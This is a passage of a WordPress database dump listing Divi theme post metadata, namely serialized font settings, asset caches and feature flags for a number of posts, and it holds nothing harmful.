:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34017,1296,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34018,844,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34019,844,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34020,844,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34008,996,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34009,1354,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34010,760,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34011,760,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34012,760,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34004,1029,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34005,996,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34006,996,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34007,996,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33997,1227,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33998,1227,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33999,1227,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34000,1227,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34001,1029,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34002,1029,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34003,1029,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33996,825,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33992,1649,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33993,825,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33994,825,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33995,825,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33988,856,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33989,1649,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33990,1649,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33991,1649,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33983,1654,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33984,1654,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33985,856,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33986,856,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33987,856,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33980,745,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33981,1654,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33982,1654,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33976,1138,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33977,745,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33978,745,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33979,745,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33971,25,'_divi_dynamic_assets_cached_feature_used','a:12:{s:18:\"excerpt_content_on\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:26:\"fullscreen_section_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:8:\"lightbox\";a:0:{}s:25:\"media_embedded_in_content\";a:0:{}}'),(33972,25,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33973,1138,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33974,1138,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33975,1138,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33970,1273,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33965,813,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33966,813,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33967,1273,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33968,1273,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33969,1273,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33962,862,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s